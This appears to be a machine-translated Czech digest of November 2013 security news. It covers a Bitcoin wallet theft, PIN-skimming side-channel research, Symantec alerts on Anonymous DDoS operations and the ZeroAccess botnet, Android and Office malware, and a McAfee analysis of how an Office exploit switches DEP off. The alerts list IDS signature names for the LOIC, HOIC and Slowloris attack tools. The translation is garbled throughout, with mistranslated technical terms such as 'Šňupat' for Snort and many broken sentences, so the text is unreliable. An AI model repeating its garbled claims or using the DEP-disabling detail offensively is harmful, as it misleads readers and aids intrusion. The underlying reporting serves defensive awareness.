Další problém pro Bitcoin tento týden po australském kontě služby připustil, že útočníci se vloupali do jejich systémů a utekl s více než 1.200.000 dolarů v hodnotě z digitálního crypto-měně.
Krádež je na frak od sporných výzkumné zprávě tvrdí, že menší než původně myslel-koalice horníků Bitcoin mohl splynout dohromady, aby vytvořily monopol na vytváření bloků na knihy Bitcoin je.
Bitcoin horníci mají za úkol vytvářet nové kryptografické moduly pro blok řetězce, hlavní knihy, na kterých je uvedeno každé veřejné Bitcoin transakce. Každý nový blok musí odrážet informace o transakci z bývalého bloku. Tak, každý blok musí obsahovat v sobě záznam každého oprávněného Bitcoin transakce vůbec provádět. V daném okamžiku je jedna směrodatná Bitcoin blok řetězce. Pokud uživatel nebo skupina uživatelů, vytváří delší blok řetězce - stejně jako v, jeden, který odráží více transakcí, než ten před ním - a pak, že řetěz se stává autoritativní člověk. Generátory nových bloků jsou uděleny nové Bitcoiny protože úkol, který se rovná vyřešení neuvěřitelně obtížný matematický problém, vyžaduje obrovské množství výpočetního výkonu.
Bitcoin peněženka služby jsou jen místa, kde mohou uživatelé ukládat své Bitcoiny.
Inputs.io nabízený sebe jako nejbezpečnější Bitcoin peněženky k dispozici. Ale zpráva Inputs.io přispíval v místě svých internetových stránkách uvádí, že útočníci ohrožena službu dvakrát, takže pryč s 4100 Bitcoiny.
"Dva hacky celkové (sic), asi 4100 BTC zbývá Inputs.io schopen zaplatit všechny uživatelské bilance," píše zpráva. "Útočník ohrožena hosting účet prostřednictvím kompromitujících e-mailových účtů (některé velmi staré a bez připojených telefonních čísel, takže to bylo snadné reset). Útočník se podařilo obejít 2fa kvůli vadou na straně serveru hostitele. "
Na fóru s názvem Bitcointalk uživatel, působící pod rukojetí TradeFortress, údajně majitel inputs.io, tvrdí, že se snaží vydávat částečné náhrady osobám, které ztratily peníze kvůli hack, ale že nemá dostatek vlastních osobně Bitcoiny plně nahradit veškeré ztráty. On také vypadá, že se naučili klíčovou lekci, která nabízí následující rady všem na fóru:
"Nedoporučuji ukládáním Bitcoiny dostupné na počítačích připojených k internetu."
Krádež PIN kódy vzkaz a Nod
8.11.2013 Zabezpečení | Mobil
Security výzkumníci vyvinuli řadu různých metod ukrást nebo obejít hesel na většině běžných mobilních phone platforem, z nichž některé se spoléhají na chyby v softwaru a další, které jsou jednoduché techniky sociálního inženýrství. Nyní, pár vědců z University of Cambridge přišli s novým bočním kanálu útoku, který jim umožňuje odvodit mobilních uživatelů PIN kódy docela dobrou přesností pomocí kameru a mikrofon na mobilním telefonu.
Tato technika je zdánlivě jednoduchý koncept: Software vědců pracuje na mobilním zařízení, a když uživatel zadá její PIN kód, software záznamy úhoz zvuky přes mikrofon a používá fotoaparát, kdo ohodnotí telefonu orientaci a sledovat uživatele tvář, zatímco ona je psaní. Pomocí těchto vstupů, software vědců ukázala, že může odvodit uživatele čtyřmístný kód PIN lepší než 50 procent času po pouhých pěti pokusech na Samsung Galaxy S3.
"Tím, záznam zvuku při zadání PIN, můžeme odhalit dotykových událostí (viz kapitola 3.4). Díky nahrávání videa z přední kamery při zadání PIN, můžeme načíst rámečky, které odpovídají na dotek události. Pak jsme extrahovat změny orientace z dotykové události rámů a ukážeme, že je možné vyvodit, která část obrazu se dotkl uživatelů, "uvádějí vědci v novinách," PIN Skimmer: podsouvat PIN přes kameru a mikrofon ", kterou napsal Ross Anderson a Laurent Simon.
Aby bylo možné provést útok, by útočník musí získat jejich PIN Skimmer software do oběti zařízení. Předpokládají, ve svém článku, že oběť stáhli škodlivý aplikace z Google Play nebo jiného App Store, který nese jejich software jako užitečného zatížení. Oni zpočátku myslel, že jejich aplikace by pak muset využít zranitelnost na zařízení, aby bylo možné spustit jako root, ale brzy zjistil, že to není nutné a že aplikace může získat přístup ke kameře a mikrofonu s některými chytrých triků. Jakmile je to na telefonu, můžete PIN Skimmer spustit několika různými druhy dopravy, včetně sledování, shromažďování, učení a přihlášení režimy.
Sběr režim je místo, kde aplikace shromažďuje data, která potřebuje pomoci odvodit klíčové doteky uživatel provede při zadávání svého kódu PIN. To zahrnuje jednoduchou hru, ve které se uživatel dotkne obrazovku několikrát, aby odpovídaly různých ikon na obrazovce. Fotoaparát pořídí snímek s každým stiskem klávesy a později nahraje, že uložená data na vzdálený server, kde vačka být zpracovány v režimu offline. Tato data se přivádí na algoritmus, který učí uživatele a zlepšuje chování malwaru schopnost odhadovat uživatele PIN.
Malware má řadu stealth schopností, včetně schopnosti vyřadit LED světlo, když je fotoaparát zapnutý a manipulovat s OS skrýt počtu odeslaných paketů. PIN Skimmer má také schopnost snížit hluk zajat telefonu v prostředí kolem něj, zlepšení přesnosti klávesu mikrofonu dotykové sbírky.
Obrana proti útokům postranními kanály, jako je tento, je obtížné, ale autoři řekl, že jsou některé věci, které lze udělat pro zmírnění dopadů jejich útoku.
"OS-level zmírňování svůdné, protože se soustřeďuje na změny v jednom místě a přínos pro všechny AP-kace. V Android, tam jsou hlavně dva způsoby, jak podnítit uživatele k zadání kódu PIN. První je použít AlertDialog s možností android: password = "true" v mani-fest souboru. Možnost pokyn operačního systému se zobrazí hvězdička (znak "*") namísto číselných zadali. Na displeji se-ing na AlertDialog s touto volbou, doporučujeme OS také odepřít přístup ke sdíleným hardwarových prostředků z jiných uživatelsky nainstalovaných aplikací. Druhým způsobem vyzve k zadání PIN je přes komponentu GUI (aktivita). V tomto případě doporučujeme OS vystavit PasswordActivity, která dědí z činnosti, "říká dokument.
Další možnosti mohou zahrnovat randomizing umístění kláves na klávesnici, která by mohla být bolest pro uživatele, nebo pro vynucení delší hesel.
"Ortogonální protiopatření za účelem zmírnění útoky postranními kanály, je použít delší kolíky (nebo fráze) pro zvýšení entropie hádat, ale to má vliv památnost a použitelnost. Další další protiopatření je prosazovat maximální počet pokusů, jako je PIN pro bankovní karty. Bohužel, počet smartphone aplikace, které vyžadují PIN postupem času zvyšovat, nutí uživatele, aby znovu použít ve všech aplikacích a službách (např. bankovnictví). Proto je stále obtížnější prosadit maximální počet pokusů o PIN, "řekl autoři.
Nová hrozba: OpNov5th / OpVendetta - Service Alert
8.11.2013 Hrozby
Kdo: Anonymous - politicky motivované skupiny hacktivists (většinou USA a Velká Británie based).
Co: více operací byly pojmenovány různými skupinami, primární dva ar OpNov5th a OpVendetta. Tyto operace mohou zahrnovat Denial of Service útoky a znetvoření webové stránky zaměřené na vládní zařízení po celém světě.
Kdy : Circa 05.11.2013.
Proč: 5.listopadu je výročí aktivistů a hacktivists získat on-line a veřejně protestovat vlády. Je známo, že anonymní členy jako "Guy Fawkes den".
HROZEB ÚDAJE:
Členové hacktivist group Anonymous se sídlem mimo USA a Velké Británii, veřejně prohlásila, že se zaměří na "všechny" vládní zařízení po celém světě na podporu "Occupy" hnutí. Anonymní nazývá tento den "globální občanské neposlušnosti", nebo přesněji den občanské neposlušnosti a sociální aktivismus přes pokojný protest.
Datum 5.listopadu je významné pro členy Anonymous kvůli filmu a komiksu "V jako Vendeta", kde Guy Fawkes, milující svobodu, teroristické pokusy zničit autoritativní vládu ve Spojeném království.
K dispozici jsou omezené údaje týkající se specifických nástrojů, které budou použity jako součást této operace. Na základě předchozích zjištění, že útoky budou pravděpodobně využívají více útoku, včetně odmítnutí služby, webové aplikace využije, a webových stránek znetvoření. Známé Anonymní hacktivist DoS / DDoS nástroje, jako Loic, HOIC a Slowloris bude pravděpodobně používat.
Možné útoku, patří:
Šířka pásma Sytost - Využití jako velkou šířku pásma, jak je to možné s DoS / DDoS útoky.
Zranitelné Software Využití - Využití zranitelné systémy se známými nebo staré zranitelnosti, což vede k znetvoření webových stránkách.
Resource Hladovění - Záplavy webové servery s velkým počtem spojů nebo nikdy nekončící datové toky, které se pomalu zahltit cílový webserver.
DOPAD:
Veřejné oznámení podle těchto skupin jsou často používány jako prostředek k získání proslulosti nebo pozornosti médií a může být velmi volatilní důvěryhodnosti. Tyto útoky jsou obvykle nízká stupnice se skládá z aktivit DDoS proti veřejně přístupných webových serverů, úsilí webových stránek znetvoření nebo dat vykořisťování. Symantec MSS má brát tyto hrozby vážně a má detekci na místě.
SOC detekčních schopností
Odpověď byla přijata opatření s cílem poskytovat MSS zákazníkům včasného varování a potenciální eskalace pro úspěšné těžbou související s touto hrozbou. Podpisy Tísňové může způsobit falešně pozitivních a podstoupí ladění k zajištění lepší přesnosti jako další informace jsou k dispozici, ale vzhledem k povaze hrozby, je rozumné být příliš opatrný upozornění na potenciálně souvisejících činností. Obraťte se soc analýza týmu, pokud máte nějaké dotazy nebo připomínky týkající se této detekci nebo chcete diskutovat s podpisy takové zakázané či jinak upravit, aby vyhovoval vašim potřebám organizace.
MSS SOC ANALYTICKÉ DETEKCE
Anomální Dopravní detekce
Pokročilé sledování pouze
PRODEJCE DETEKCE
High Orbit Ion Cannon (HOIC) Nástroj
Snort / SourceFire
ET CURRENT_EVENTS High Orbit Ion Cannon (HOIC) Útok Příchozí generická detekce Double prostorovým UA
[MSS Snort Detection] High Orbit Ion Cannon (HOIC) Útok Příchozí (Ne Booster)
NetScreen IDP 3.x
DDOS: HOIC-HTTP METODA
Palo Alto Networks Firewall
zranitelnost [0] / HOIC Tool Dos Detection (34767)
Low Orbit Ion Cannon (LOIC) Nástroj
Snort / SourceFire
ET CURRENT_EVENTS Odchozí Low Orbit Ion Cannon LOIC nástroj interní uživatel se mohl účastnit DDOS
ET Web_Server LOIC Javascript DDoS Příchozí
ET CURRENT_EVENTS Příchozí Low Orbit Ion Cannon LOIC DDOS nástroj desu řetězec
DDOS útok JavaScript LOIC
TippingPoint
TCP: LOIC DDoS nástroje
IntruShield
HTTP: Možné HTTP GET Loic Denial-of-Service útok detekován-0x4001d000
HTTP: HTTP Možná LOIC Denial-of-Service útok detekován-0x4001c000
HTTP: Možné LOIC Get Request Zjištěno-0x40299d00
HTTP: Možné LOIC Get Request Zjištěno-0x40299d00
CheckPoint
asm_dynamic_prop_LOIC_DNS
Fortinet
DoS: JS.LOIC.DoS
JS.LOIC.DoS
Symantec AV
Android.Loicdos
Palo Alto Networks Firewall
zranitelnosti [3] / Loic DDoS útok (33708)
McAfee AV
HTool-Loic
Slowloris nářadí
ISS Sensor
HTTP_Slowloris
Šňupat upozornění
ZVLÁŠTNÍ OHROŽENÍ Slowloris-http DoS nástroj
TippingPoint
HTTP: Slowloris DoS nářadí
IntruShield
HTTP: Možné Slowloris Denial of Service útok detekován-0x40263e00
Zmírňování a doporučení:
Společnost Symantec doporučuje zákazníkům používat vrstvený přístup k zabezpečení jejich prostředí, s využitím nejnovějších technologií společnosti Symantec, včetně celopodnikové monitorování bezpečnosti od hrany k koncového bodu.
Diskutujte DoS / DDoS strategie pro zmírnění s upstream poskytovatele a zajistit, že jsou si vědomi této hrozby.
Zkontrolujte, zda je IT a IT Security zaměstnanci jsou připraveni a vědí, co mají dělat v případě útoku.
Zajistěte, aby všechny operační systémy a veřejné čelí stroje mají nejnovější bezpečnostní záplaty a antivirové definice.
Zajistěte, aby všechny webové servery jsou oprava, nakonfigurován tak, aby se minimalizoval vliv DoS / DDoS útokům, a zatvrdil proti vnějším hrozbám.
Využijte firewallů pro webové aplikace jako přední linii obrany proti útokům.
Využijte DDoS služby.
Nová hrozba: Sinkholing ZeroAccess - Service Alert
8.11.2013 Viry
POZADÍ :
V pondělí 30.září 2013, byl článek zveřejněn na blogu Symantec Security Response společnosti Symantec podrobně úsilí na sinkholing 500000 z botů, které patří do ZeroAccess botnet. Jak srpna 2013 botnet je jedním z největších v existenci dnes s populací v nahoru o 1,9 milionu počítačů. ZeroAccess používá peer-to-peer (P2P) jako jeho velení a řízení (C & C) komunikační mechanismus.
V březnu tohoto roku, Symantec bezpečnostních inženýrů začal studovat mechanismy používané ZeroAccess roboty komunikovat spolu navzájem ve snaze zjistit, zda by mohly být sinkholed. 29. června, pozorovali novou verzi ZeroAccess je distribuován přes P2P sítě. Aktualizovaná verze se zabývala konstrukční chybu, která dělala botnet ohroženy jsou sinkholed. Nicméně, Symantec byl ještě úspěšný v sinkholing velkou část botnetu.
16. července Symantec začal sinkholing ZeroAccess infekcí. Tato operace se rychle vyústila v odtržení více než půl milionu roboty, což výrazně snižuje počet botů ovládaných bot pána.
HROZEB ÚDAJE:
ZeroAccess botnet byl původně objeven na nebo kolem 13.července 2011. ZeroAccess je trojský kůň, který využívá pokročilé rootkit ukrýt. ZeroAccess můžete také vytvořit skrytý souborový systém, stáhněte si další malware, a otevřít zadní vrátka na ohrožena počítače.
Botnet ZeroAccess je navržen pro náklad do infikovaných počítačů. Stažené užitečná zatížení jsou primárně využívány pro účely příjmů generace (Bitcoin Těžba a Click Fraud).
Klikněte Podvod
Jeden typ užitečného zatížení jsme viděli, je klikání Trojan. Trojan stáhne on-line reklamy do počítače a pak generuje umělé kliknutí na reklamy, jako by byly generovány oprávněné uživatele. Tito falešní kliknutí počítat pro vyplácení náhrad v pay-per-click (PPC), affiliate programy.
Bitcoin Těžba
Virtuální měna má řadu atrakcí pro zločinci. Způsob, jakým každý Bitcoin vstoupí do existence je založena na provádění matematických operací známých jako "dobývání" na počítačového hardwaru. Tato činnost má přímý hodnotu do bot master a náklady na nic netušící oběti (zvýšil účet za elektřinu).
Hrozba je distribuován několika způsoby, pomocí drive-by-download je nejčastější způsob útoku. Ohrožena webové stránky mohou přesměrovat uživatele na škodlivé webové stránky určené k využití nic netušící uživatele a nainstalovat ZeroAccess. Uživatel může také kliknout na přílohu v e-mailu phishing, což vede ZeroAccess instalován na pozadí bez vědomí uživatele.
SOC detekčních schopností
Pro zákazníky s členskými státy IDS / IPS bezpečnostních služeb řízení, bude prodejce bázi podpisy se automaticky rozmístěny, jak na prodávajícího doporučení. Pokud máte zájem o další informace týkající se podpisových státy na svých zařízeních, nebo chcete-li požádat o aktivaci konkrétního podpisu, kontaktujte support@monitoredsecurity.com .
Pro zákazníky s monitory pouze IDS / IPS zařízení Symantec MSS nadále poskytuje bezpečnostní monitoring na tuto hrozbu.
KOMPONENTY a detekce
ZeroAccess - MSS detekce:
[MSS URL Detection] Trojan.ZeroAccess CnC provozu
[MSS URL Detection] Trojan.ZeroAccess Škodlivý Stáhnout
[MSS URL Detection] ZeroAccess bot callback (klikání)
Hot IP - Potenciální ZeroAccess statistiky Tracker Ping (53/UDP)
Hot IP - Potenciální ZeroAccess statistiky Tracker Ping (na portu 123) (2)
Hot IP - Potenciální ZeroAccess statistiky Tracker Ping (na portu 53/123)
Hot IP - Trojan.ZeroAccess P2P botnet Node (1)
Hot IP - Trojan.ZeroAccess P2P botnet Uzel (2)
Hot IP - ZeroAccess CnC provozu
Hot IP - ZeroAccess CnC provozu (přes 123/UDP)
Hot IP - ZeroAccess CnC provozu (přes 53/UDP)
Hot IP - ZeroAccess Sinkhole činnost
ZeroAccess - Vendor detekce:
Detekce od následujících dodavatelů byla pozorována MSS:
FireEye
Fortinet
IntruShield
McAfee AV
McAfee Endpoint Protection
NetScreen IDP
Palo Alto Networks Firewall
Šňupat
Symantec AV
Aplikace Symantec Endpoint Protection signatur IPS
Zmírňování a doporučení:
Společnost Symantec doporučuje zákazníkům používat vrstvený přístup k zabezpečení jejich prostředí, s využitím nejnovějších technologií, včetně Symantec Enterprise-Wide monitorování bezpečnosti od hrany k koncového bodu.
Pro techniku, monitorovaných / řízen MSS, zajistit, aby všechny podpisy jsou aktuální, včetně koncových technologií.
Zajistěte, aby všechny operační systémy a veřejné čelí stroje mají nejnovější bezpečnostní záplaty, a antivirový software a definice aktuální.
Zajistěte systémy mají běžící firewall, jsou zbytečné porty uzavřeny / zablokovány a nevyužitých služeb jsou zakázány.
Ujistěte se zaměstnanci vzděláváni o sociálním inženýrství a phishingové techniky.
Co můžete očekávat od MSS:
Symantec MSS SOC bezpečnostních analytiků bude i nadále pečlivě sledovat, analyzovat a ověřovat všechny události svědčí o ZeroAccess Trojan. MSS bude i nadále provádět průběžné upřesnění detekce.
Malware trhovců testování nových technik infekce
8.11.2013 Viry
Probíhající škodlivé spam UPS vydává za kampaň ukázala, že malware trhovců experimentují s různými přístupy k infikování nešťastné uživatele a další nedávné spam kampaně ukázaly, že jeden z nich je efektivní zejména:. Vložení škodlivého kódu do RTF nebo DOC soubory První kampaň, analyzovány malwaru výzkumník Blaze Bart , začíná s falešným o doručení UPS, který nese i soubor DOC (údajně faktury), a odkaz na faktuře. E-mailová adresa je falešné, aby to vypadalo, jako je zpráva pochází z legitimního UPS e-mailovou adresu. Připojený soubor a ten, stáhnout pomocí odkazu jsou stejné: falešný DOC soubor, který je vlastně soubor RTF obsahující exploit . Pomocí OfficeMalScanner je RTFScan nástroj, Blaze zjistil, že soubor nese zranitelné OLE dokument, který využívá MS Office zranitelnosti k instalaci škodlivého kódu počítače oběti. Další vzorek dostal udělal totéž, ale využívány další Office chybu. Neměl podaří zjistit, co je malware spadl na zem, ale spekuluje, že je pravděpodobné, že Bitcoin mining Trojan Zeus nebo informace-krást jeden. Ve velmi podobnou kampaň spatřen Kaspersky Lab vědci, je stejný postup použít: údajně legitimní e-mail nesoucí "potvrzení" ve formě souboru ve formátu RTF nese v sobě CPL soubor, který je ve skutečnosti bankovnictví Trojan napsaný v Delphi:
"Vložení škodlivé soubory do formátu RTF nebo DOC soubory umožňuje zločinci obejít filtrování e-mailů pomocí seznamu přípon nebo druhu, také jim umožňuje překonat AV detekci signatur," vědci vysvětlují tím, že jsou jisti, že si tato technika je sam masivně využívána v budoucnosti. Co se dá udělat pro ochranu sebe sama z toho? Obvykle: aby se vaše Windows a Office aktualizován (použité exploity jsou většinou staré a již záplatované) a používat bezpečnostní software. Více technicky zdatní uživatelé mohou také zlepšit zabezpečení souborů Office zakázáním ActiveX, makra a blokování externího obsahu, a síťoví administrátoři mohou blokovat IP adresy vázané na škodlivých kampaní. "I když spammery a autory malwaru se snažili techniku přikládání škodlivého souboru nebo odeslání odkaz v e-mailu, neviděl jsem jim to, že jak moc, "říká Blaze. "Pomocí těchto využije, to je jasné, že jsou důkazem, testování jejich možnosti. Kolik padli nebo padne pro tuto kampaň? Kolik z těchto maily byly rozeslány vlastně je? Neexistuje žádný jistý způsob, jak zjistit. "
Svpeng Android bankovnictví Trojan jde phishing
8.11.2013 Viry | Phishing
Bankovní Android Trojan známý jako Svpeng byla zlepšena jeho tvůrci a nyní je schopen provádět phishingové útoky, stejně jako krást peníze přímo od oběti bankovní účet prováděním příkazů ze vzdáleného C & C. Je to latter zasláním SMS na čísla dvou ruských bank, kontrola tímto způsobem, pokud tento konkrétní telefon má kartu vázána na to. Pokud je odpověď ano, malware pokračuje zaslat tuto informaci do C & C, od které obdrží příkazy k převodu peněz z oběti účtu na jeden ovládanými útočníků. Svpeng je v současné době pouze z zaměřit ruské uživatele, i když rozšíření potenciální oběti bazén je pravděpodobné, protože má schopnost rozpoznat zařízení operační systém nastavení jazyka. To se šíří pomocí falešných SMS zpráv. Tato nejnovější změna je malware zjistit, kdy uživatel spustí bankovní aplikaci na konkrétní (a jeden z největších) ruských bank, a nahradit otevřené okno s falešnou ten, který je naprogramován k odeslání zadat přihlašovací údaje k podvodníci stojí za tohoto režimu. Kromě toho, malware dělá to samé, když uživatel spustí Google Play, a to ukazuje falešné okno, ve kterém je uživatel vyzván k zadání svého údaje o kreditní kartě. Opět jsou data posílána na podvodníky.
. Svpeng také má dobrý ochranný mechanismus proti mobilních AV řešení "Aby se zabránilo bezpečnostní produkty z jeho smazání Trojan stále používá standardní Android nástroj - deviceAdmin," vysvětluje expert společnosti Kaspersky Lab Roman Unuchek. "Chcete-li zabránit uživatelům zakázat DeviceAdmin, Trojan využívá dosud neznámou chybu zabezpečení v systému Android. Stejným způsobem se snaží, aby se zabránilo resetování telefonu do továrního nastavení.
Počítačoví zločinci se rozhodly pro real-time malware a phishing kampaně
8.11.2013 Kriminalita | Viry | Phishing
Ve třetím čtvrtletí roku 2013 došlo k dalšímu využití real-time malware kampaní a dramatickému nárůstu phishingových stránek, v závislosti na Commtouch.
Stále větší využívání současných zpravodajských událostí pokračoval ve 3. čtvrtletí. Doba mezi skutečné události a související malware útoku neustále klesá v průběhu celého roku a nyní průměry jen 22 hodin. Real-time malware kampaně ve 3. čtvrtletí použité zprávy o královské dítě Prince George, NSA informátor Edward Snowden a krize Sýrie. počet phishingových stránek dramaticky zvýšila během 3. čtvrtletí o téměř 35%. PayPal phishingové stránky samy o sobě představovaly zhruba 750 nových phishingových stránek každý den. malý pokles o 5% by mohl být viděn v počtu škodlivých webových stránek uvedených v URL Commtouch v GlobalView databáze. Cestovní webové stránky byly nejpopulárnější internetové stránky kategorie pro malware distributorů, následuje dopravní a obchodní webové stránky. Vzdělávání, který byl číslo jedna ve 2. čtvrtletí klesl na číslo šest. "Q3 zdůrazňuje Trend Report, že složitost cybercriminal útoků se zvyšuje," říká Lior Kohavi, CTO Commtouch. "Jejich kampaně se obvykle zaměřují koncovým uživatelům - k ochraně uživatelé, poskytovatelé internetových služeb, e-mail hosters a poskytovatelé obsahu musí být vědoma těchto trendů, a neustále zlepšovat své nástroje pro boj s těmito zločinci." Ve třetím čtvrtletí roku 2013, spam hladiny i nadále klesat. Průměrná denní množství spamu v tomto čtvrtletí 69000000000 zprávy ve srovnání s druhým čtvrtletí 83000000000 - pokles o přibližně 17%. I když čtvrtletní úroveň je nejnižší za více než čtyři roky, průměrná měsíčně se zvyšuje od historické minimum červnových o 63 miliard zpráv denně až do poklesu v září. V průběhu 3. čtvrtletí, spam představoval 70% všech e-mailů odeslaných na celém světě, mohou klesat i pod 62%, na začátku srpna. nejoblíbenější spamu tématem byla dieta s podílem 40,2% (ve 2. čtvrtletí se umístil tři, přičemž 10,8%) . Stock spam přesunul ze 7. pozice (4,7%), ve 2. čtvrtletí na druhé pozici (20%) -. Tzv. penny zásob spam mohl být viděn pravidelně v posledním čtvrtletí průměrné denní množství malwaru naleznete v e-mailu zůstala téměř beze změny oproti minulému čtvrtletí na téměř 2 miliardy e-mailů denně. Tato průměrná skryje stálý nárůst od července do září, která zahrnovala výskytu dvojnásobek denního průměru. Indie zůstává největším světovým zombie hospoda: V průběhu třetího čtvrtletí roku 2013, Indie zůstala na prvním místě s nejvyšším počtem spam-botů odesílání - i když jejich podíl poklesl o 6% na 13,2%. Rusko se zdá absorbovat většinu této procenta a pohyboval od 8. místa do druhého. Nové položky jsou Ukrajina, Saúdská Arábie a Španělska, zatímco Spojené státy, Srbsko, Mexiko a vypadl z top 15.
Vyřešení záhady Office zero-day využívat a DEP
8.11.2013 Zranitelnosti
Dne 5. listopadu McAfee Labs blozích Microsoft Office zero-day útoku, který jsme spatřili ve volné přírodě. V dalším příspěvku jsme se zabývali pokrytí našich různých produktů. Nyní bychom chtěli oznámit některé zajímavé technické poznatky z našeho výzkumného týmu.
Jak bylo uvedeno v našem předchozím příspěvku , jsme zjistili, že exploit funguje docela dobře na Office 2007 s operačním systémem Windows 7. Původně jsme si myslel, že musí být nějaká technika používaná ke zneužití obejít rozvržení adresního prostoru randomizace a Zabránění spuštění dat. Nicméně, naše výsledky ukazují něco jiného, protože DEP nastavení systémových zásad.
Při ladění shell kódu, všimli jsme si docela dost zajímavých věcí. Za prvé, shell kód byl v PAGE_READWRITE bloku paměti, který nás povzbudil k dalšímu zkontrolovat DEP stav procesu Winword.exe. Našli jsme DEP stav byl "on" na zahájení procesu, ale na "OFF" při spuštění shell kódu.
McAfee Labs výzkumník Haifei Li bylo toto exploit pracoval na úrovni systému DEP možností, včetně obou Opt-In a opt-out pro sadu Office 2007. Je-li systém je nastavena zásada opt-in, je DEP povolena pouze pro procesy, které výslovně opt-in závisl. Office 2007 Word není ve DEP povoleno seznamu, a tak DEP není povolena pro Office 2007 v rámci režimu opt-in a není potřeba exploitu obejít DEP uspět. Testovali jsme dále na opt-out režimu. Je-li systém politika je nastavena na opt-out, je DEP ve výchozím nastavení povoleno pro všechny procesy, kromě těch, které výslovně odhlásit DEP. To znamená, že obvykle je na DEP pro všechny procesy pro tuto možnost, když se začnou, ale proces má možnost odhlásit se z DEP v každém okamžiku. Zjistili jsme, že pokud budeme zablokoval načítání VBE6.dll (C: \ Program Files \ Common Files \ Microsoft Shared \ VBA \ VBA6 \ VBE6.dll), by exploit nefunguje-DEP-k chybě narušení byl spuštěn. Také, pokud jsme nuceni Zabránění spuštění dat s Microsoft Emet by exploit nefunguje.
Výsledky testů nám způsobili otázku, zda došlo k DEP bypass, například pomocí ROP gadgets. Ačkoli mnoho jiní výzkumníci tvrdí tento bod po jejich analýze, oni by mohli analyzovat různé vzorky. (MD5 hash našeho zkoumaného vzorku 1FD4F3F063D641F84C5776C2C15E4621.)
Rychle jsme injekčně naše DLL v winword.exe se zahnutým LoadLibraryExA a zavolal GetProcessDEPPolicy před a po zatížení každého modulu. Otevřeli jsme protokol a zjistil, že DEP stav změní na "off" hned po načtení VBE6.dll. Po nějaké vyšetřování jsme zjistil jsem, že ntdll! ZwSetInformationProcess může být volána s parametry -1 a 0 × 22 vypnout DEP pro proces. Takže těsně před voláním LoadLibrary s VBE6.dll stanovíme bod zlomu v ntdll! ZwSetInformationProcess, a to schytal s očekávanými parametry (-1,0 × 22). Back-trasování volání, jsme narazili na toto:
DEP_1
Toto je kód zakázat DEP pro proces:
DEP_2
To řeší záhadu využití. Naše analyzovány exploit neměl obejít ASLR a DEP. Místo toho zadlužuje o zpětné kompatibility Office 2007 zakázat DEP. Bez DEP, ASLR je poměrně snadné obejít se haldy stříkání, jak je uvedeno v tomto příspěvku Microsoft SRD .
Věříme, že DEP problém s kompatibilitou starých DLL jako VBE6.dll dělá toto využití možné. Microsoft vedení potvrdil naše podezření. Systém DEP politika může být nastavena na opt-in, opt-out, Always-On a vždy-Off. Pouze Always-On volba vynutí spuštění dat, což znamená, že proces nelze vypnout DEP. Z důvodů kompatibility může Always-On nastavení způsobí DEP související s pády způsobené aplikacemi sady Microsoft Office otevírání dokumentů, které obsahují Visual Basic for Applications makra.
Z toho plyne ponaučení jsme se dozvěděli, je zajímavá. Pro lepší zabezpečení by měl být systém nastavení DEP být Always-On. Ale pro kompatibilitu, můžete Opt-Out se používá k ochraně aplikací, které předpokládají DEP dispozici. Nicméně Opt-Out nastavení systému nemusí mít plnou ochranu DEP pro aplikaci, která není výslovně odhlásit DEP, a tak jako aplikace (Microsoft Word v tomto případě), je stále předmětem zneužití, které mohou být zabráněno DEP.
Hypervisor-based, Hardwarová podpora monitorování systému
8.11.2013 Ochrana | Zabezpečení
V posledních letech se mnoho různých technik byl zaveden analyzovat škodlivé binární spustitelné soubory. Většina z těchto metod využít virtuálního počítače introspekce (VMI), proces analýzy stavu virtuálního počítače z vnější strany. Na jedné straně, mnoho přístupů založených na systému, emulátory, které umožňují přísnou kontrolu nad programu. Bohužel, tyto přístupy typicky vyvolat obrovský výkon nad hlavou. Na druhé straně, tam jsou přístupy založené na hypervisorům. Brzy implementace byly brzděny chybějící virtualizability na architektuře x86 instrukční sady: protože jednotka správy paměti (MMU), sám nebyl virtualizovat, paměť oddělení potřeboval být vykonáno v softwaru se pomoci tzv. "stínové stránka" tabulek, přístup, který znovu vyvolal výkon nad hlavou. Nicméně, procesor prodejci nedávno přidal hardwarovou podporu virtualizace MMU a moderní procesory nabízejí tzv. "dvourozměrné" paging k překonání těchto překážek výkonu. Tato prezentace z Virus Bulletinu 2013 ukazuje, jak lze tuto funkci využít procesor implementovat binární Analýza rámce. Přesněji řečeno, autoři uvádějí přístup ke sledování kódu založené na konceptu V současné době spustitelného stránek (CXP), tj. přesně určit, které stránky paměti jsou v současné době spustitelný umožnit zachycení intermodular volání funkcí a jejich odpovídající výnosy. při zadržení dojde, se vztahují VMI odvodit runtime informací, jako parametry funkcí. K prokázání praktickou proveditelnost navrženého přístupu, jsou prováděny "VMMInspector", což je framework pro binární analýzy na 64bitových strojích a Windows 7. V několika případových studií mají různé scénáře použití pro tento rámec. Mezi další aplikace, které ukazují, jak může být jádro rootkit TDSS/TDL4 být analyzovány automatizovaným způsobem.
Firmy nabízí společné odměny za hledání chyb
8.11.2013 Zranitelnosti | Zabezpečení
Společnosti Microsoft a Facebook se rozhodly společně sponzorovat nový program, který bude vývojářům, expertům, ale i běžným uživatelům vyplácet odměnu za chyby nalezené ve známých programech.
Členy komise, jež bude posuzovat jednotlivé návrhy, budou lidé z Facebooku, Googlu, Microsoftu a několika dalších společností, kteří se již obdobných programů v minulosti účastnili. „Náš cíl je jednoduchý – chceme, aby internet byl lepším místem pro všechny uživatele,“ stojí v oficiálním prohlášení na hackerone.com, což je webová stránka, jež nový program hostuje. V rámci akce budou odměňovány chyby a zranitelnosti nalezené ve vývojářských jazycích Python, Ruby, PHP a Perl; vývojářských nástrojích a frameworcích Django, Ruby on Rails a Phabricator, webových serverech Apache a Nginx a sandboxu Google Chrome, Internet Exploreru, Adobe Readeru a Flash Playeru.
Odměněno bude také objevení bezpečnostní chyby, která postihuje jiný software, jenž je na trhu uživateli hojně využíván. Mezi příklady bezpečnostních rizik vývojáři na hackerone.com uvedli například útok BEAST proti SSL a DNS cache, který v roce 2008 objevil Dan Kaminsky. Odměny budou závislé na závažnosti nahlášené chyby a softwaru, který postihuje. Například odměna za zranitelnosti v Phabricatoru bude začínat na 300 dolarech a může dosáhnout až desetinásobku této částky, za zranitelnosti objevené v sandboxu internetových protokolů lze pak získat minimálně pět tisíc dolarů. Konkrétní sumu vždy přisoudí komise. Pokud by se vývojář rozhodl spolu s popisem chyby zaslat i opravu, bude odměna dvojnásobná. Nový program není adresován pouze bezpečnostním expertům, ale komukoli, kdo objeví chybu/zranitelnost v softwaru. V současné době vyplácení odměn sponzoruje pouze Microsoft a Facebook.
